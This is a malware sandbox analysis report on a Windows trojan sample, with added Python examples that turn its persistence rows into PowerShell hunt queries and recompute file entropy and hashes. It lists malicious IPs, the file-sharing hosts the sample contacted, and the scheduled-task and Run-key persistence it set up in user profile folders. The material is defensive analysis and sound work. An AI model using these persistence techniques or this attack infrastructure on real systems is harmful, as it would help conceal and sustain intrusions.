https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000001D.00000003.434050256.000001A704395000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.434111178.000001A704802000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmp | false | | high
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | false | | high
https://dynamic.t | svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://disneyplus.com/legal. | svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | false | URL Reputation: safe |
                                                                                                  unknown
                                                                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000006.00000002.308878855.0000023970029000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://activity.windows.comsvchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://help.disneyplus.com.svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://%s.dnet.xboxlive.comsvchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          low
                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmpfalse
                                                                                                            high

Contacted IPs

Public

IP               Domain                  Country             ASN     ASN Name                                          Malicious
188.166.28.199   unknown                 Netherlands         14061   DIGITALOCEAN-ASNUS                                true
172.67.139.105   goo.su                  United States       13335   CLOUDFLARENETUS                                   false
8.209.70.0       host-data-coin-11.com   Singapore           45102   CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC  false
54.38.220.85     unicupload.top          France              16276   OVHFR                                             false
144.76.136.153   transfer.sh             Germany             24940   HETZNER-ASDE                                      false
162.159.130.233  cdn.discordapp.com      United States       13335   CLOUDFLARENETUS                                   false
81.163.30.181    unknown                 Russian Federation  58303   IR-RASANAPISHTAZIR                                true
185.233.81.115   unknown                 Russian Federation  50113   SUPERSERVERSDATACENTERRU                          true
185.7.214.171    unknown                 France              42652   DELUNETDE                                         true
185.186.142.166  unknown                 Russian Federation  204490  ASKONTELRU                                        true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553220
Start date: 14.01.2022
Start time: 13:57:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 38s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 9ro85QVN0F.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.mine.winEXE@41/30@88/11
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 23.9% (good quality ratio 15.8%)
• Quality average: 49.2%
• Quality standard deviation: 40.4%
HCA Information:
• Successful, ratio: 56%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.211.4.86, 23.211.4.250, 23.211.5.146, 13.89.179.12, 20.54.110.249, 40.91.112.76
• Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, e4578.dscb.akamaiedge.net, patmushta.info, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, storeedgefd.xbetservices.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
13:58:53  Task Scheduler   Run new task: Firefox Default Browser Agent D5FEEC786DC5C0BA path: C:\Users\user\AppData\Roaming\iscgwer
13:59:10  API Interceptor  1x Sleep call for process: E6C4.exe modified
13:59:12  API Interceptor  1x Sleep call for process: WerFault.exe modified
13:59:18  API Interceptor  1x Sleep call for process: MpCmdRun.exe modified
13:59:22  API Interceptor  7x Sleep call for process: svchost.exe modified
13:59:53  Task Scheduler   Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
14:00:06  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
14:00:32  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
14:01:03  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe
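The rows above are the report's persistence observations (two scheduled tasks, three Run values) and its record of the sandbox shortening Sleep calls, flattened into one line each. The block below is an added example, not Joe Sandbox code: the REPORT_ROWS are copied from the table, while the row grammar, the "user-writable directory" heuristic, the treatment of HKCU64 as the 64-bit view of the same hive and the PowerShell query templates are the example's own assumptions. It turns each row into an indicator and the command an analyst would run to check a suspected host for it.

```python
"""Parse sandbox 'Behavior and APIs' rows into persistence indicators and
endpoint hunt queries. Added example; the row format is inferred from the
report above, the scoring heuristic and query templates are assumptions."""
import re
from dataclasses import dataclass

# Assumption: profile directories writable without elevation. Anything that
# persists from here is worth a look; legitimate software rarely needs to.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\")

RUN_RE = re.compile(r"^(?P<time>\d\d:\d\d:\d\d)AutostartRun: (?P<key>\S+\\Run) (?P<name>\S+) (?P<path>.+)$")
TASK_RE = re.compile(r"^(?P<time>\d\d:\d\d:\d\d)Task SchedulerRun new task: (?P<name>.+?) path: (?P<path>.+)$")
SLEEP_RE = re.compile(r"^(?P<time>\d\d:\d\d:\d\d)API Interceptor(?P<count>\d+)x Sleep call for process: (?P<proc>\S+) modified$")


@dataclass(frozen=True)
class Indicator:
    time: str
    kind: str        # "run_key" or "scheduled_task"
    location: str    # registry key, or "Task Scheduler"
    name: str        # Run value name or task name
    path: str
    suspicious: bool


def _user_writable(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in USER_WRITABLE)


def parse_rows(rows):
    """Return (indicators, sleeps). Rows matching no pattern are ignored."""
    indicators, sleeps = [], []
    for row in rows:
        row = row.strip()
        if m := RUN_RE.match(row):
            indicators.append(Indicator(m["time"], "run_key", m["key"], m["name"], m["path"], _user_writable(m["path"])))
        elif m := TASK_RE.match(row):
            indicators.append(Indicator(m["time"], "scheduled_task", "Task Scheduler", m["name"], m["path"], _user_writable(m["path"])))
        elif m := SLEEP_RE.match(row):
            sleeps.append((m["time"], m["proc"], int(m["count"])))
    return indicators, sleeps


def hunt_query(ind: Indicator) -> str:
    """PowerShell to check one indicator on a live host. Assumption: the
    report's HKCU64 prefix is the same hive seen through the 64-bit registry
    view, so both HKCU and HKCU64 map onto the HKCU: drive."""
    if ind.kind == "run_key":
        hive, _, rest = ind.location.partition("\\")
        hive = hive[:-2] if hive.endswith("64") else hive
        key = hive + ":\\" + rest
        return f"Get-ItemProperty -Path '{key}' -Name '{ind.name}' -ErrorAction SilentlyContinue"
    return f"Get-ScheduledTask -TaskName '{ind.name}' -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Actions"


# Rows copied from the report's Behavior and APIs table.
REPORT_ROWS = [
    r"13:58:53Task SchedulerRun new task: Firefox Default Browser Agent D5FEEC786DC5C0BA path: C:\Users\user\AppData\Roaming\iscgwer",
    r"13:59:10API Interceptor1x Sleep call for process: E6C4.exe modified",
    r"13:59:12API Interceptor1x Sleep call for process: WerFault.exe modified",
    r"13:59:18API Interceptor1x Sleep call for process: MpCmdRun.exe modified",
    r"13:59:22API Interceptor7x Sleep call for process: svchost.exe modified",
    r"13:59:53Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe",
    r"14:00:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe",
    r"14:00:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe",
    r"14:01:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe",
]
# Constructed control row (not from the report): a Run value pointing into
# Program Files must not be flagged by the heuristic.
CONTROL_ROW = r"14:02:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\Program Files\Microsoft OneDrive\OneDrive.exe"


if __name__ == "__main__":
    inds, sleeps = parse_rows(REPORT_ROWS + [CONTROL_ROW])
    for i in inds:
        flag = "SUSPICIOUS" if i.suspicious else "          "
        print(f"{flag} {i.time} {i.kind:<14} {i.name} -> {i.path}")
        print("           " + hunt_query(i))
    total = sum(c for _, _, c in sleeps)
    procs = {p for _, p, _ in sleeps}
    print(f"{total} Sleep calls shortened by the sandbox across {len(procs)} processes")
```

All five entries from the report land under AppData and are flagged; the Driver value shows up twice because the report logs the HKCU and HKCU64 views separately. The API Interceptor rows are the sandbox's own doing (it patches Sleep to speed the run up), so the timestamps in the table are not the sample's real delays.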

Joe Sandbox View / Context

IPs: No context
Domains: No context
ASN: No context
JA3 Fingerprints: No context
Dropped Files: No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_411E.exe_136b771e572cd787a55eb6b4a02adbff53ae1a72_57e8a279_1a0b6c9c\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8137658224565194
Encrypted: false
SSDEEP: 192:beMd8rgzkz8HQ0l/XjjIq/u7shS274IteYtA:FzeEQ0lLjN/u7shX4ItLA
MD5: 54030922AB757909919668CCE6BDFE26
SHA1: F7C7360D8229C3B9B9282873D87A1BA1DB940EA9
SHA-256: 7CBEB7A9C2D918533091E4B7F000F889999399AAE61B5D6240906A35490F0582
SHA-512: CB7B2EBBF569B33482720D2B17C73A939E6906B679EF69537288DE7171F923AC1237C5EE467F5FD60F089FE34CD334B265F5CDB4AE98ABEEFCA043DA187A1B89
Malicious: false
Reputation: unknown
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.7.1.1.4.8.4.9.2.1.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.7.1.1.5.0.9.4.5.2.9.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.d.5.1.0.a.d.-.5.2.5.6.-.4.6.f.6.-.b.9.f.4.-.c.8.4.5.a.e.1.2.8.5.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.4.8.6.6.e.f.-.b.3.7.1.-.4.9.a.2.-.8.1.7.f.-.6.7.f.8.d.8.6.e.2.9.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.1.1.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.a.0.-.0.0.0.1.-.0.0.1.c.-.1.5.c.0.-.9.6.e.f.9.1.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.1.a.5.1.6.0.7.b.f.b.d.1.3.3.7.e.3.8.2.1.9.1.6.3.b.7.9.4.9.e.d.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.4.1.1.E...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
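Every dropped-file entry carries the same fingerprint fields: size, 8-bit entropy, an Encrypted flag, the four hashes and a dotted preview. The block below is an added example, not Joe Sandbox code, showing how those fields are derived. It runs over a constructed UTF-16LE Report.wer fragment modelled on the preview above (the field values are made up) and over a flat 0x00..0xFF byte run as the high-entropy contrast; the 7.5 bits-per-byte cutoff for the Encrypted flag is the example's own assumption, not the sandbox's published threshold.

```python
"""Recompute the per-file fields of a sandbox dropped-file entry (size,
8-bit Shannon entropy, entropy-based 'encrypted' flag, MD5/SHA-1/SHA-256/
SHA-512 and a dotted preview). Added example, not Joe Sandbox code."""
import hashlib
import math
from collections import Counter

# Assumption: the cutoff above which content is treated as compressed,
# encrypted or packed. Joe Sandbox does not publish the value it uses.
ENCRYPTED_ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (flat)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def dotted_preview(data: bytes, limit: int = 64) -> str:
    """Render bytes the way the report's Preview column does: printable ASCII
    is kept, every other byte (including the NULs of UTF-16) becomes '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:limit])


def file_profile(data: bytes) -> dict:
    """The fields a dropped-file entry lists, computed from the raw bytes."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": ent,
        "encrypted": ent > ENCRYPTED_ENTROPY_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "preview": dotted_preview(data),
    }


# Constructed sample: a WER Report.wer is UTF-16LE text with a BOM and CRLF
# line endings. Field names follow the preview above; the values are invented.
SAMPLE_WER = ("\ufeff" + "\r\n".join([
    "Version=1",
    "EventType=BEX",
    "EventTime=132866711484921751",
    "ReportType=2",
    "Consent=1",
    "NsAppName=411E.exe",
]) + "\r\n").encode("utf-16-le")

# Constructed contrast: every byte value exactly once, the flattest possible
# distribution, which is what encrypted or well-compressed data looks like.
FLAT_BYTES = bytes(range(256))


if __name__ == "__main__":
    for label, blob in (("Report.wer (constructed)", SAMPLE_WER), ("flat 0x00..0xFF", FLAT_BYTES)):
        p = file_profile(blob)
        print(f"{label}: size={p['size']} entropy={p['entropy']:.3f} encrypted={p['encrypted']}")
        print(f"  sha256={p['sha256']}")
        print(f"  preview={p['preview']}")
```

Because UTF-16LE stores every ASCII character with a trailing NUL, half the bytes of a WER report are 0x00 and its entropy stays low even though it is readable text, which is why the Report.wer above scores 0.81 and its preview alternates letters with dots. Values near 8 are the ones that matter when reading these entries: they mark payloads that are packed, compressed or encrypted and therefore worth unpacking before static analysis.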
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DF6.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Fri Jan 14 21:59:09 2022, 0x1205a4 type
Category: dropped
Size (bytes): 36668
Entropy (8bit): 2.1217822657706638
Encrypted: false
SSDEEP: 192:ihDigrUJrLROeh0kGb4j+icei5FJvEHKPPt7juIp:iSZweeBY2fp
MD5: 7BAAB78ECED1127F2905C0DB7BD9E54A
SHA1: D83E4F1F16068D95ED7E589FFBCA6A5805E15293
SHA-256: FC0AC1AB27D249802E1C4175AAC4E198BDD028A4C3507C7DCFF68855B92B4C96
SHA-512: 840696EFB7E86435C32CE9A3D2792BDBD43BA196A0259C2987F1D4531E9ECC1A0CACC75D5DE4E8907105FA14EDCA736D056162952B46F2CF331A3FD2A3A4FAB5
Malicious: false
Reputation: unknown
Preview: MDMP....... .......-..a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T...........$..a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6394.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8388
Entropy (8bit): 3.699114705496345
Encrypted: false
SSDEEP: 192:Rrl7r3GLNi8ul6u6YF8mSU7Kgmf/eRS6CpD689bK8sfZtum:RrlsNi36u6Y/SU7Kgmf2RSpKPfD
MD5: F79F27A8134D52B4589E5C28B3ECD2BB
SHA1: 166E199AC5C5EF78EBD4D23D0E155595C09CF4DD
SHA-256: 3680569F87C99CCC37A6E30AA68654FA0F78A74D4F0A847E6BD2EE268402B53C
SHA-512: CC8E2C3B52AB4C1202946F2AE00C55639831880EC4BDE63B37E09BC01D96DC0CEC9F33BCD7B1955AC679308D7A5A5A8BD30B223F301404452E4A10E7D73E7455
Malicious: false
Reputation: unknown
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.5.6.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER65C8.tmp.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4685
                                                                                                            Entropy (8bit):4.471314868456998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwSD8zssJgtWI99JWSC8BO/8fm8M4Jd8qF7+q8vL8tiWmKRgTd:uITfq+4SNRJBKKDmKRgTd
                                                                                                            MD5:5DBE7B67816566709F3ACF0B172F033A
                                                                                                            SHA1:09A9B5D572149E224529D966BAA7F9727C67DED6
                                                                                                            SHA-256:D441D8FBF876BCEE9B18B8F06C904948DB9EE3A8F916B98DF959EE32A9FF7B58
                                                                                                            SHA-512:A3A7ACB4A1CD8529A24821501076D45F680633DC97186337C88CE5E393A9333407A5D4F30D27EE59335F6CD5BC1F702DA64EA42B4BAA7E73D3895D5B07B3E0B5
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FD6B.exe.log
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):700
                                                                                                            Entropy (8bit):5.346524082657112
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                            MD5:65CF801545098D915A06D8318D296A01
                                                                                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11022541052871243
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:26uXm/Ey6q9995ahq3qQ10nMCldimE8eawHjcxRH:267l68vLyMCldzE9BHjcxR
                                                                                                            MD5:E125A0B0D33FEA7326D8F39DDADEDBE4
                                                                                                            SHA1:D74F3115620849008B523785B5A106C57A51F949
